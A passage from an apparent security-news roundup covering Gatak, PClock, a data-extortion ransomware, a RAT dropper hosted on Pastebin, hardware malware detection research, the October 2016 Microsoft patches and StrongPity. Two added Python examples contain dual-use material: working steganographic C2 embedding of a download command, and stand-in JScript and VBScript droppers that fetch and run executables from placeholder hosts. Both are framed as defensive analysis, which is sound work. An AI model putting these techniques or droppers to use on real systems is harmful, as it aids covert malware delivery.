    Downloads: https://downloads.malwarebytes.com/file/mb3/ or https://data-cdn.mbamupdates.com/web/mb3-setup-consumer- - [Size: 49.6 MB]
  11. Website spreading Gatak-infected keygens (via Symantec)

    Websites offering free keygens for various enterprise software applications are helping crooks spread the Gatak malware, which opens backdoors on infected computers and facilitates attacks on a company's internal network, or the theft of sensitive information. Gatak is a backdoor trojan that first appeared in 2012. Another name for this threat is Stegoloader, and its main distinctive feature is its ability to communicate with its C&C servers via steganography.

    Gatak relies on steganography to stay hidden

    Steganography is the technique of hiding data in plain sight. In the world of cyber-security, steganography is the practice of hiding malicious code, commands, or malware configuration data inside PNG or JPG images. The malware, in this case Gatak, connects to its online C&C server and requests new commands. Instead of receiving commands in plain HTTP network requests, which all security software knows to be on the lookout for, the data is sent as an innocuous image, which looks like regular web traffic. The malware reads the image's hidden data and executes the command, all while the local antivirus thinks the user has downloaded an image off the Internet.

    Keygens for enterprise software spreading Gatak

    Security firm Symantec says it uncovered a malware distribution campaign that leverages a website offering free keygens for various applications such as:
    - SketchList3D - woodworking design software
    - Native Instruments Drumlab - sound engineering software
    - BobCAD-CAM - metalworking/manufacturing software
    - BarTender Enterprise Automation - label and barcode creation software
    - HDClone - hard disk cloning utility
    - Siemens SIMATIC STEP 7 - industrial automation software
    - CadSoft Eagle Professional - printed circuit board design software
    - PremiumSoft Navicat Premium - database administration software
    - Originlab Originpro - data analysis and graphing software
    - Manctl Skanect - 3D scanning software
    - Symantec System Recovery - backup and data recovery software

    All of the above are specialized apps, deployed in enterprise environments. The group behind this campaign is specifically targeting users that use these applications at work, but without valid licenses, in the hope of infecting valuable targets they could hack, steal data from, and possibly sell it on the underground.

    Keygens don't work, they just infect users with Gatak

    The keygens distributed via this website aren't even fully-working tools. They just produce a random string of characters, but their purpose is to trick the user into executing the keygen binary just once, enough to infect the victim. The hackers are picky about the companies they target, because the security firm has seen second-stage attacks on only 62% of all infected computers. Attackers use Gatak to gather basic information about targets, and on those they deem valuable they deploy other malware at later stages. In some cases, the hackers also resort to lateral movement on the victim's network, with the attackers manually logging into the compromised PC. Attacks aren't sophisticated, and the hackers only take advantage of weak passwords inside the local network. Symantec says it didn't detect any zero-days or automated hacking tools employed when the hackers attempted to infect other devices on the local network.

    Gatak infections per industry vertical (via Symantec)

    Telemetry data shows that 62% of all Gatak infections have been found on computers on enterprise networks. Most of these attacks have targeted the healthcare sector, but it doesn't appear that the hackers specifically targeted this industry vertical, as companies in other verticals were also hit. Attackers might have opted to focus more on healthcare institutions because these organizations usually store more in-depth user data they can steal, compared to the automotive industry, gambling, education, construction, or others. "In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan," Symantec notes in a report. "They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent." Article source
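    The following is an added worked example, not code from the article or from Symantec's analysis of Gatak, showing the mechanism the post describes: a C2 command is written into the least-significant bits of pixel bytes, wrapped in a PNG that any proxy or antivirus will parse as a perfectly well-formed image, and then recovered by the client (or an analyst) from the pixel data. The PNG writer/reader, the flat grey carrier image and the command string are all constructed for the demo; the specific framing (a 4-byte length prefix, one bit per byte) is an assumption, not Gatak's real encoding.

```python
"""Added example: hiding and recovering a C2 command in PNG pixel LSBs.
Standard library only; the carrier image, the framing and the command
are constructed for the demo and are NOT Gatak's real format."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = 3  # 8-bit RGB


def _chunk(tag: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def encode_png(pixels: bytes, width: int, height: int) -> bytes:
    """Minimal 8-bit RGB PNG writer: filter type 0 on every scanline, one IDAT."""
    stride = width * CHANNELS
    assert len(pixels) == stride * height
    raw = b"".join(b"\x00" + pixels[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def decode_png(data: bytes):
    """Parse what encode_png wrote (8-bit RGB, unfiltered rows) into (pixels, w, h).
    Every chunk CRC checks out, which is exactly why a scanner sees 'just an image'."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(tag + body) & 0xFFFFFFFF != crc:
            raise ValueError("bad chunk CRC")
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB handled here")
        elif tag == b"IDAT":
            idat += body
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(idat)
    stride = width * CHANNELS
    rows = []
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("filtered scanlines not handled here")
        rows.append(row[1:])
    return b"".join(rows), width, height


def lsb_embed(pixels: bytes, secret: bytes) -> bytes:
    """Write (4-byte big-endian length + secret) one bit per byte into pixel LSBs."""
    framed = struct.pack(">I", len(secret)) + secret
    if len(framed) * 8 > len(pixels):
        raise ValueError("carrier too small for payload")
    out = bytearray(pixels)
    for i in range(len(framed) * 8):
        bit = (framed[i // 8] >> (7 - i % 8)) & 1
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def _read_lsb_bytes(pixels: bytes, offset_bits: int, nbytes: int) -> bytes:
    out = bytearray()
    for b in range(nbytes):
        value = 0
        for k in range(8):
            value = (value << 1) | (pixels[offset_bits + b * 8 + k] & 1)
        out.append(value)
    return bytes(out)


def lsb_extract(pixels: bytes) -> bytes:
    """Inverse of lsb_embed: read the length prefix, then that many bytes."""
    length = struct.unpack(">I", _read_lsb_bytes(pixels, 0, 4))[0]
    if length * 8 + 32 > len(pixels):
        raise ValueError("length prefix exceeds carrier; probably no payload")
    return _read_lsb_bytes(pixels, 32, length)


def c2_roundtrip(command: bytes, width: int = 16, height: int = 16) -> bytes:
    """Server side: embed a command in a flat grey carrier and emit a PNG.
    Client/analyst side: parse the PNG back and recover the command."""
    carrier = bytes([0x80]) * (width * height * CHANNELS)  # constructed carrier image
    png = encode_png(lsb_embed(carrier, command), width, height)
    pixels, _, _ = decode_png(png)
    return lsb_extract(pixels)


if __name__ == "__main__":
    print(c2_roundtrip(b"DOWNLOAD http://c2.invalid/next.bin"))
```

    The practical point for defenders: the PNG passes signature, structure and CRC checks, so a content inspector that validates "is this really an image" learns nothing. Detection has to come from context instead, such as which process fetched the image, how often it polls the same URL, or the LSB statistics of an image that should have been flat, and the flat 0x80 carrier used here is the degenerate case where a stego payload is trivially visible in the LSB plane; real photographs are much noisier.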
  12. A new spam wave posing as emailed fax messages is delivering a malware downloader that fetches and installs a ransomware family known as PClock, a CryptoLocker clone. The ransomware, detected by Microsoft as Ransom:Win32/WinPlock.B or WinPlock, is more commonly referred to under the name PClock and has been going around since January 2015, when users first complained about it on the Bleeping Computer forums. Emsisoft security researcher Fabian Wosar was able to create a decrypter for the earlier versions that allowed users to unlock their files for free. By May 2015, the PClock team updated their code and broke the decrypter. After that point, PClock victims could only restore their files from backups or by paying the ransom.

    PClock resurfaces with new spam wave

    Since then, the number of infections with PClock has been low but steady. Microsoft's security team recently picked up a spike in activity from the group's operators. In their most recent spam campaign, the ransomware's creators are using emails disguised as fax messages, using a subject such as "PLEASE READ YOUR FAX T6931." The title is boring and mundane, but the email contains a file named "Criminal case against you," which might get some users' attention.

    PClock installed via Crimace trojan

    This RAR archive contains a WSF file. When users download and open the archive and execute the WSF file, a JScript function starts a series of operations that download and install a malware known as Crimace, detected as TrojanDownloader:JS/Crimace.A. This threat is a malware downloader, a trojan that connects to an online server and downloads and runs other malware. In this case, it was PClock. If we take a look at the screenshots posted on the Bleeping Computer forums in January 2015, and the screenshots taken by Microsoft, we see that PClock hasn't evolved, at least visually, at all.

    PClock January 2015 variant
    PClock November 2016 variant (Source: Microsoft)

    The ransomware has remained at the same level of sophistication, still posing as a CryptoLocker clone, even if other more dangerous ransomware families have emerged in the meantime.

    PClock still an entry-level operation

    Furthermore, PClock's operators have yet to figure out how to host a decryption service on the Dark Web, the standard method for dealing with decryption operations, preferred by most high-end ransomware threats. After almost two years in the wild, PClock has remained an entry-level operation, requiring victims to get in contact with PClock's authors via email, a cumbersome and time-consuming task. The only thing that has changed is the number of targeted files. Initial PClock variants targeted only 100+ file types for encryption, while the most recent variant targets a whopping 2,630 file types. Article source
  13. Batu69

    Next-Gen Ransomware

    The one thing about cybercriminals is that they are persistent and always find a new way to attack, and they tend to improve themselves to stay ahead of cyber defenders. Recently we received one malware sample and the infected PC too, so we took a look at the malware sample. At first we thought this was just another variant of ransomware, but after doing some analysis we found that this malware does not encrypt any files but still asks for a ransom. Below are the pictures of the ransom note. Most previous ransomware notes include the encryption method, the deadline to decrypt the files, a bitcoin address for payment etc. But this ransom note is different and has the title “Notice of Imposition of File”. This ransom note looks like a notice sent from a federal office and contains the following notices: Materials that Violate the Intellectual Property Right; Suspicious Activity. After reading the note, we can come to the conclusion that this note threatens the victim into paying a fine within 24 hours to settle the case out of court, with the following text: “You must pay penalty within 24 hours to settle the case out of court. Incase of failure to comply claims ALL COLLECTED DATA WILL BE MADE PUBLIC AND THE CASE GOES TO THE TRIAL.” This note also provides all the details of the victim, which include: Name, Birthday, Phone, Email, Location Area, Skype Account Details, Facebook Account Details, LinkedIn Account Details, IP Address, CPU Details, System Details, PC Name, Username. The note also contains images of the victim from Facebook and LinkedIn, and pictures taken from the webcam. When victims click the payment option, it takes them to a payment page where victims are requested to fill in their basic details and their credit card details.

    In short, when this malware infects a PC, it collects all the data of the victim, even captures a picture from the webcam, creates the ransom note described above and threatens the victim to pay the ransom or have their private data leaked in public.

    More About This Malware

    This malware is distributed via the Nuclear Exploit Kit, and users become victims when they visit a compromised WordPress website which redirects to the Nuclear Exploit Kit server. We have identified one IP that has been used by the cybercriminals to spread this malware.

    Analyzed Samples: d5738a0199b58a754b03980349a66b89

    Behavioural Analysis

    After being deployed, the malware disappears and runs a dropped copy of itself from a hidden folder created in C:\Users\Username\AppData\Local\Temp\Low. It also creates a link to the dropped malware in \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, and it drops other files: z32jwcdbdaz7ab52tyxhr7x2smatqp2k, zqweejj6blyvyxxq4da4rzvh3un5pzvv.exe and __config3271.bat. Then this malware starts to talk to its Command and Control (C&C) server. We have identified two C&C servers. When the victim PC starts to communicate with the C&C, the malware starts to collect data from the victim PC which can be used for the ransom note. After the data is collected to create the ransom note, the malware becomes active and locks the screen with the ransom note. The following picture shows the malware process running in the background. When a victim sends the requested ransom to the cyber criminals, the request is sent to the crooks' server via a secure communication (TLS). The server IP is which is behind Tor. Find the malware analysis details here: https://malwr.com/analysis/MGVjYmJjY2I4ZTMwNDMwOWE5MDkzMWFmZTk5MDE4YTI/

    This malware has evolved to another level and has become next-generation ransomware.

    How to protect yourself from malware?
    - Install anti-virus/malware software.
    - Keep your anti-virus software up to date.
    - Run regularly scheduled scans with your anti-virus software.
    - Use an updated version of your operating system.
    - Back up your files.
    - Think before you click.
    - Use strong passwords with two-step verification.
    - Cover up your webcam.

    Article source
  14. Dmitry Ponomarev, professor of computer science at Binghamton University, State University of New York, is the principal investigator of a project titled 'Practical Hardware-Assisted Always-On Malware Detection.' Credit: Jonathan Cohen/Binghamton University Fighting computer viruses isn't just for software anymore. Binghamton University researchers will use a grant from the National Science Foundation to study how hardware can help protect computers too. "The impact will potentially be felt in all computing domains, from mobile to clouds," said Dmitry Ponomarev, professor of computer science at Binghamton University, State University of New York. Ponomarev is the principal investigator of a project titled "Practical Hardware-Assisted Always-On Malware Detection." More than 317 million pieces of new malware—computer viruses, spyware, and other malicious programs—were created in 2014 alone, according to work done by Internet security teams at Symantec and Verizon. Malware is growing in complexity, with crimes such as digital extortion (a hacker steals files or locks a computer and demands a ransom for decryption keys) becoming large avenues of cyber attack. "This project holds the promise of significantly impacting an area of critical national need to help secure systems against the expanding threats of malware," said Ponomarev. "[It is] a new approach to improve the effectiveness of malware detection and to allow systems to be protected continuously without requiring the large resource investment needed by software monitors." Countering threats has traditionally been left solely to software programs, but Binghamton researchers want to modify a computer's central processing unit (CPU) chip—essentially, the machine's brain—by adding logic to check for anomalies while running a program like Microsoft Word. If an anomaly is spotted, the hardware will alert more robust software programs to check out the problem. 
The hardware won't be right about suspicious activity 100 percent of the time, but since the hardware is acting as a lookout at a post that has never been monitored before, it will improve the overall effectiveness and efficiency of malware detection. "The modified microprocessor will have the ability to detect malware as programs execute by analyzing the execution statistics over a window of execution," said Ponomarev. "Since the hardware detector is not 100-percent accurate, the alarm will trigger the execution of a heavy-weight software detector to carefully inspect suspicious programs. The software detector will make the final decision. The hardware guides the operation of the software; without the hardware the software will be too slow to work on all programs all the time." The modified CPU will use low complexity machine learning—the ability to learn without being explicitly programmed—to classify malware from normal programs, which is Yu's primary area of expertise. "The detector is, essentially, like a canary in a coal mine to warn software programs when there is a problem," said Ponomarev. "The hardware detector is fast, but is less flexible and comprehensive. The hardware detector's role is to find suspicious behavior and better direct the efforts of the software." Much of the work—including exploration of the trade-offs of design complexity, detection accuracy, performance and power consumption—will be done in collaboration with former Binghamton professor Nael Abu-Ghazaleh, who moved on to the University of California-Riverside in 2014. Lei Yu, associate professor of computer science at Binghamton University, is a co-principal investigator of the grant. Grant funding will support graduate students that will work on the project both in Binghamton and California, conference travel and the investigation itself. The three-year grant is for $275,000. Article source Other source: These researchers are modifying CPUs to detect security threats
  15. While it is not uncommon to find malware or code on Pastebin, it is a surprise to find a dropper that downloads the payload from Pastebin on the fly. The payload has turned out to be a RAT with keylogger capabilities.

    The dropper

    The dropper is not much more than an adaptable package to deliver the actual payload. This one is called VMWare.exe and the first screen of the installer presents itself as “WindowsInstall”. Although we are not entirely sure of its origin, this makes us consider a method of infection that is typical for sites offering cracks and keygens.

    The payload

    When we ran the sample, we noticed a connection to a specific Pastebin page. The code posted is a Visual Basic script that downloads and runs a file called Tempwinlogon.exe. The executable itself is posted in hexadecimal and reconstructed by the function in the script. We copied and altered the script to see where it puts the file. Don’t try this at home folks, at least not on a computer you need. Running unknown scripts that you happened to find somewhere isn’t always a good idea. The destination of the file turned out to be C:\Users\{username}\AppData\Local\Tempwinlogon.exe (on a system running Windows 7).

    The RAT

    This proved to be a .NET Trojan, detected by some vendors as Bladabindi, which is very similar to njRAT. It has keylogger functionality and connects to an IP in the 37.237.112.* range.

    keylogger

    The executable is copied to C:\Users\{username}\AppData\Roaming\Tr.exe and to C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\353cd7180c8c415bfffe6958aebb47d8.exe to gain persistence. If the running process (Tr.exe) is stopped (by using the Task Manager, for example), this results in an immediate BSOD as shown below:

    File details
    SHA1 VMWare.exe: 45653c39e8201a0b3c469ae6208ad6f2ed9835a4
    SHA1 Tempwinlogon.exe: b777b4c35ba0933f310b885a28e972c578a39922
    Detected by Malwarebytes Anti-Malware as Trojan.Agent.GenX.IPH

    The Malwarebytes Website Protection Module blocks all traffic to the C2 server. A full removal guide can be found on our forums. Do consider changing your passwords though, if you have been infected with this RAT, since the passwords might have been compromised by this threat. After we reported this to Pastebin, the source page has been taken down.

    Summary
    A dropper we analyzed downloaded the code for part of its payload from Pastebin on the fly. The payload turned out to be a RAT with keylogging capabilities. Article source
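    Two of the posts above describe the same analyst problem from different angles: the PClock campaign (post 12) arrives as a .wsf whose JScript downloads and runs the next stage, and the Pastebin dropper (post 15) pulls a VBScript that rebuilds Tempwinlogon.exe from a hex string. The block below is an added example, not code from Microsoft's or Malwarebytes' write-ups, of the static triage an analyst would run on such a script before executing anything: it flags the download-then-execute chain by the COM objects it needs (an HTTP client, a file writer, a process launcher), pulls URLs, and carves any hex-encoded executable out of concatenated string literals and hashes it. The two scripts inside are constructed stand-ins for the real ones; the URL, paths and hex bytes are invented.

```python
"""Added example (not from either article): static triage of a Windows script dropper.
The JScript .wsf and the VBScript hex dropper below are constructed stand-ins, not
the real PClock/Crimace or Pastebin samples."""
import hashlib
import re

# COM ProgIDs / calls a download-and-execute script needs. Each stage on its own is
# legitimate; the combination in one short script is the signal.
INDICATORS = {
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write": re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject|\bSaveToFile\b", re.I),
    "process_launch": re.compile(r"WScript\.Shell|Shell\.Application|\bShellExecute\b|\.(?:Run|Exec)\s*\(", re.I),
}
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)
STRING_LITERAL = re.compile(r'"([^"\n]*)"')
HEX_LITERAL = re.compile(r"(?:[0-9A-Fa-f]{2})+")


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def carve_hex_payloads(script: str, min_bytes: int = 32) -> list:
    """Join runs of adjacent all-hex string literals (the `h = h & "4D5A..."` idiom
    used to smuggle a binary through a paste site) and decode runs >= min_bytes."""
    runs, current = [], []
    for lit in STRING_LITERAL.findall(script) + [""]:  # sentinel flushes the last run
        if lit and HEX_LITERAL.fullmatch(lit):
            current.append(lit)
        elif current:
            runs.append(bytes.fromhex("".join(current)))
            current = []
    return [blob for blob in runs if len(blob) >= min_bytes]


def triage_script(script: str) -> dict:
    """Return indicator hits, URLs, carved payload hashes and an overall verdict."""
    hits = {name: sorted(set(rx.findall(script))) for name, rx in INDICATORS.items()}
    urls = sorted(set(URL.findall(script)))
    payloads = [{"size": len(b), "sha1": sha1_hex(b), "is_pe": b[:2] == b"MZ"}
                for b in carve_hex_payloads(script)]
    if hits["http_client"] and (hits["file_write"] or hits["process_launch"]):
        verdict = "download-and-execute"
    elif any(p["is_pe"] for p in payloads):
        verdict = "embedded-executable"
    elif hits["process_launch"] or hits["file_write"]:
        verdict = "suspicious"
    else:
        verdict = "no-indicator"
    return {"verdict": verdict, "indicators": hits, "urls": urls, "payloads": payloads}


# Constructed stand-in for the fax-themed .wsf: fetch, write to disk, run.
SAMPLE_WSF_JSCRIPT = r'''<job id="fax"><script language="JScript">
var http = new ActiveXObject("MSXML2.XMLHTTP");
http.open("GET", "http://example.invalid/fax/T6931.exe", false);
http.send();
var stream = new ActiveXObject("ADODB.Stream");
stream.Type = 1; stream.Open(); stream.Write(http.responseBody);
stream.SaveToFile("C:\\Users\\Public\\fax.exe", 2);
new ActiveXObject("WScript.Shell").Run("C:\\Users\\Public\\fax.exe");
</script></job>'''

# Constructed stand-in for the Pastebin VBScript: a PE (here just an 'MZ' stub)
# carried as concatenated hex literals, written out and launched.
SAMPLE_VBS_HEX_DROPPER = r'''Dim h
h = "4D5A90000300000004000000FFFF0000"
h = h & "B8000000000000004000000000000000"
h = h & "00000000000000000000000000000000"
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("C:\Users\victim\AppData\Local\Tempwinlogon.exe")
' hex-to-binary conversion and f.Write elided in this stand-in
CreateObject("WScript.Shell").Run "C:\Users\victim\AppData\Local\Tempwinlogon.exe"
'''

if __name__ == "__main__":
    for name, sample in (("fax.wsf", SAMPLE_WSF_JSCRIPT), ("paste.vbs", SAMPLE_VBS_HEX_DROPPER)):
        print(name, triage_script(sample))
```

    The carved hash is what you pivot on (VirusTotal, your EDR, the vendor's IOC list) without ever running the dropper, which is the safe version of the "we copied and altered the script" step in post 15. The caveat is that these are plain-text indicators: a script that builds "MSXML2.XMLHTTP" with Chr() calls or splits its hex into non-adjacent variables evades all three regexes, so treat "no-indicator" as "needs a sandbox", not as clean.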
  16. Microsoft Security Bulletins October 2016

    Microsoft Security Bulletins October 2016 provides you with an overview of all security and non-security patches Microsoft released in that month. Microsoft released updates for supported operating systems and other company products on today's patch day. This guide provides you with information on the patches and related information. It covers all security and non-security updates that Microsoft released, plus additional information and links that may prove useful.

    It begins with an executive summary highlighting the most important information about the October 2016 Patch day. This is followed by the list of affected Windows client and server operating systems, and other Microsoft products. The severity and number of updates is listed for each product so that you can see at first glance how products that you use are affected. What follows is the list of security bulletins, security advisories, and non-security updates that Microsoft released in October 2016. The last part lists download options, and links to additional resources.

    Executive Summary

    Updates for Windows 7 and 8 are provided as monthly rollup patches instead of individual updates from this Patch day on. We covered this in detail, and suggest you check out this article for details. Microsoft released a total of 10 security bulletins on the October 2016 Patch Day. Five of the ten bulletins are rated with a maximum severity rating of critical (highest), the remaining five with a maximum severity rating of important (second highest). All Microsoft client and server operating systems are affected by vulnerabilities. Microsoft Silverlight, Microsoft .NET Framework, Microsoft Office, and various business products are affected as well.

    Operating System Distribution

    All client versions of Windows are critically affected by MS16-118, MS16-120 and MS16-122. Windows 8.1, RT 8.1 and Windows 10 are furthermore critically affected by MS16-127. Windows 10 on top of that is critically affected by MS16-119. Windows 10 is also affected by MS16-126, rated important, which fixes issues in the Microsoft Internet Messaging API. MS16-119 is a cumulative security update for Microsoft Edge. MS16-127 updates the integrated Adobe Flash Player on those systems.
    - Windows Vista: 3 critical, 2 important, 1 moderate
    - Windows 7: 3 critical, 2 important, 1 moderate
    - Windows 8.1: 4 critical, 2 important
    - Windows RT 8.1: 4 critical, 2 important
    - Windows 10: 5 critical, 3 important
    - Windows Server 2008: 1 critical, 2 important, 1 moderate, 1 low
    - Windows Server 2008 R2: 1 critical, 2 important, 1 moderate, 1 low
    - Windows Server 2012 and 2012 R2: 1 critical, 2 important, 2 moderate
    - Server core: 1 critical, 3 important

    Other Microsoft Products
    - Microsoft .NET Framework Security Only Release: 1 important
    - Microsoft .NET Framework Monthly Rollup Release: 1 important
    - Skype for Business 2016: 1 important
    - Microsoft Lync 2010, 2013: 1 important
    - Microsoft Live Meeting 2007 Console: 1 important
    - Microsoft Silverlight: 1 important
    - Microsoft Office 2007, 2010: 2 important
    - Microsoft Office 2013, 2013 RT, 2016: 1 important
    - Microsoft Office for Mac 2011, 2016: 1 important
    - Microsoft Word Viewer: 2 important
    - Microsoft Office Compatibility Pack Service Pack 3: 2 important
    - Microsoft SharePoint Server 2010, 2013: 1 important
    - Microsoft Office Web Apps 2010, 2013: 1 important

    Security Bulletins (critical bulletins were shown in red in the original)
    - MS16-118 -- Cumulative Security Update for Internet Explorer (3192887): This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer.
    - MS16-119 -- Cumulative Security Update for Microsoft Edge (3192890): This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge.
    - MS16-120 -- Security Update for Microsoft Graphics Component (3192884): This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, Silverlight, and Microsoft Lync.
    - MS16-121 -- Security Update for Microsoft Office (3194063): This security update resolves a vulnerability in Microsoft Office. An Office RTF remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle RTF files.
    - MS16-122 -- Security Update for Microsoft Video Control (3195360): This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if Microsoft Video Control fails to properly handle objects in memory.
    - MS16-123 -- Security Update for Windows Kernel-Mode Drivers (3192892): This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.
    - MS16-124 -- Security Update for Windows Registry (3193227): This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker can access sensitive registry information.
    - MS16-125 -- Security Update for Diagnostics Hub (3193229): This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application.
    - MS16-126 -- Security Update for Microsoft Internet Messaging API (3196067): This security update resolves a vulnerability in Microsoft Windows. An information disclosure vulnerability exists when the Microsoft Internet Messaging API improperly handles objects in memory.
    - MS16-127 -- Security Update for Adobe Flash Player (3194343): This security update resolves vulnerabilities in Adobe Flash Player when installed on all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.

    Security advisories and updates

    Non-security related updates
    - KB3194798 -- Update for Windows 10 Version 1607: The update includes quality improvements according to Microsoft. The history lists various fixes for issues, as well as security updates released today. See this page for details.
    - KB3192392 -- Security only update for Windows 8.1 and Windows Server 2012 R2: Security updates to Microsoft Video Control, kernel-mode drivers, Microsoft Graphics Component, Windows registry, and Internet Explorer 11.
    - KB3185331 -- Monthly Rollup for Windows 8.1 and Windows Server 2012 R2: This security update includes improvements and fixes that were a part of update KB3185279 (released September 20, 2016) and also all security updates of KB3192392.
    - KB3192391 -- Security only update for Windows 7 SP1 and Windows Server 2008 R2 SP1: Security updates to Windows authentication methods, Internet Explorer 11, Microsoft Graphics component, Microsoft Video Control, kernel-mode drivers, Windows registry, and Microsoft Internet Messaging API.
    - KB3185330 -- Monthly Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1: This security update includes improvements and fixes that were a part of update KB3185278 (released September 20, 2016), and also resolves the security updates listed under KB3192391.
    - KB3191208 -- Update for Windows 10 Version 1511: Can't install Windows servicing updates in Windows 10 Version 1511.
    - KB3197099 -- Dynamic Update for Windows 10 Version 1607: Compatibility update for upgrading to Windows 10 Version 1607: October 11, 2016.
    - KB890830 -- Windows Malicious Software Removal Tool - October 2016.
    - KB2952664 -- Update for Windows 7: Compatibility update for upgrading Windows 7. See this article for details.
    - KB2976978 -- Update for Windows 8.1: Compatibility update for Windows 8.1 and Windows 8. See this article for details.
    - KB3192665 -- Update for Internet Explorer: ActiveX installation that uses AXIS fails after you install MS16-104.
    - KB3063109 -- Update for Windows 8.1, Windows Server 2012 R2, Windows Server 2012, Windows 7, and Windows Server 2008 R2: Hyper-V integration components update for Windows virtual machines that are running on a Windows 10-based host.
    - KB3177467 -- Update for Windows Embedded Standard 7, Windows 7, and Windows Server 2008 R2: Servicing stack update for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 20, 2016.
    - KB3179930 -- Reliability Rollup for Microsoft .NET Framework 4.5.2, 4.6 and 4.6.1 on Windows 7 and Windows Server 2008 R2.
    - KB3179949 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 and 4.6 on Vista and Server 2008.
    - KB3181988 -- Update for Windows 7 and Windows Server 2008 R2: SFC integrity scan reports and fixes an error in the usbhub.sys.mui file in Windows 7 SP1 and Windows Server 2008 R2 SP1.
    - KB3182203 -- Update for Windows 8.1, Windows RT 8.1, Windows Server 2012 R2, Windows Embedded 8 Standard, Windows Server 2012, Windows Embedded Standard 7, Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows Vista, and Windows XP Embedded: September 2016 time zone change for Novosibirsk.
    - KB3184143 -- Update for Windows 8.1 and Windows 7: Remove software related to the Windows 10 free upgrade offer.
    - KB3184951 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 on Windows Server 2012.
    - KB3185278 -- Update for Windows 7 and Windows Server 2008 R2: September 2016 update rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1. Improved support for the Disk Cleanup tool to free up space by removing older Windows Updates after they are superseded by newer updates. Removed the Copy Protection option when ripping CDs in Windows Media Audio (WMA) format from Windows Media Player. Addressed issue that causes mmc.exe to consume 100% of the CPU on one processor after installing KB3125574. Addressed issue that causes the Generic Commands (GC) to fail upon attempting to install KB2919469 or KB2970228 on a device that already has KB3125574 installed. All reported changes here.
    - KB3185279 -- Update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 2016 update rollup for Windows 8.1 and Windows Server 2012 R2. Addressed issue that causes some USB storage devices to lose authorization when the device goes into the lowest power state, requiring the user to re-authenticate using a PIN when the device moves back to a working power state. Addressed issue that causes Windows Explorer to become unresponsive when sharing a folder that is the child of at least two shared parent folders. Addressed issue that causes a COM port to become unavailable after it is repeatedly opened and closed. Addressed issue that causes devices to lose connection to their virtual private network (VPN) a few seconds after connecting, if the connection is made using an integrated mobile broadband connection. All reported changes here.
    - KB3185280 -- Update for Windows Embedded 8 Standard and Windows Server 2012: September 2016 update rollup for Windows Server 2012.
    - KB3186208 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 on Windows 8.1 and Windows Server 2012 R2.
    - KB3159635 -- Update for Windows 10 Version 1607: Windows 10 Update Assistant update.

    How to download and install the October 2016 security updates

    Updates are also provided via Microsoft's Download Center, monthly Security ISO image releases, and via Microsoft's Update Catalog. Direct Microsoft Update Catalog download links:
    - Windows 7 Security-only October 2016
    - Windows 8.1 Security-only October 2016
    - Windows 8.1 Flash security patch October 2016

    Additional resources
    - Microsoft Security Bulletin Summary for October 2016
    - List of software updates for Microsoft products
    - List of security advisories of 2016
    - Microsoft Update Catalog site
    - Our in-depth update guide for Windows
    - Windows 10 Update History
    - Windows 8.1 Update History
    - Windows 7 Update History

    Source
17. A new strain of malware has been discovered by Kaspersky Lab, named 'StrongPity,' which targets users looking for two legitimate computer programs, WinRAR and TrueCrypt. WinRAR is a file archiver utility for Windows that compresses and extracts files, while the latter is a discontinued encryption tool. The malware contains components that not only give attackers complete control of the victim's computer, but also steal disk contents and download other software that the cybercriminals need. Users in Italy and Belgium were affected the most, but infections were also recorded in Turkey, North Africa, and the Middle East.

